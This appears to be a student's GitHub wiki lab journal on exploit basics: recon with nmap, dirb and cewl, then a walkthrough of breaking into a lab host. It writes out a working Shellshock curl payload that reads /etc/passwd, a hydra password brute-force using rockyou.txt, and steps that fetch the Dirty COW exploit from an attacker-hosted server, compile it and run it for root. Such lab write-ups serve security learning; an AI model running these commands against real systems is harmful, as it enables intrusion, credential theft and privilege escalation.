Exploit Basics - 5huckle/OFFICIALTECHJOURNAL GitHub Wiki

RECON (INFORMATION GATHERING)

Tools at your disposal

  • nmap (can scan for a number of things including open ports, alive hosts, services being run, etc (see Host Discovery for more)
  • ping (can test permissions and if hosts are alive, as well as show a potential network route)
  • internet (look up exploits, troubleshoot, cross reference, etc)
  • dirb DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the responses.
  • cewl * Generates wordlists based on websites

Gather Information about your target

This could use the tools listed above, but there are a large number of tools available to use. Nmap is a very versatile program

Make sure to record any and all information found. If a ping is alive, record it. If you do an nmap scan, flush it to a file and keep it. The more information (to an extent) the merrier.

Formatting

nmaptocsv is a good tool for formatting.

nmaptocsv -i file.txt -d ','

Access target system

I used SSH this time. I used nmap to scan for open ports, the only two being 22 and 80 (ssh and http). Using http, I was able to access the target web server and coax it to give me the contents of /etc/passwd using this command

"curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd-' bash -s :'' http://10.0.5.23/cgi-bin/status"

Once I had the user account, I used grep to single out possible passwords from rockyou.txt and flush them into a new file that I passed through hydra in conjunction with the username I found to attempt to find the correct password. After hydra returned a match for the correct password, I used it to log on and it worked.

Elevating to root with no permissions

Once I accessed the target account on the target box, I did not have any permissions or authentication. I could not even use sudo despite knowing the password. My work around was using my home box that I was SSHing from to download an exploit that would allow me to gain root access called dirtycow. Here is how I downloaded it

wget https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c

I then hosted a python server

python -m http.server 80

And used the target box to access this http.server by using my VPN IP from my home box as the server IP so I could download the exploit

wget http://10.0.99.35/dirtycow.c

I compiled it on the target box

gcc -pthread dirty.c -o dirty -lcrypt

I gave it execute permissions

chmod +x dirty

Then I ran dirty

./dirty

And I was done. Here is the guide I used https://bond-o.medium.com/dirty-cow-2c79cd6859c9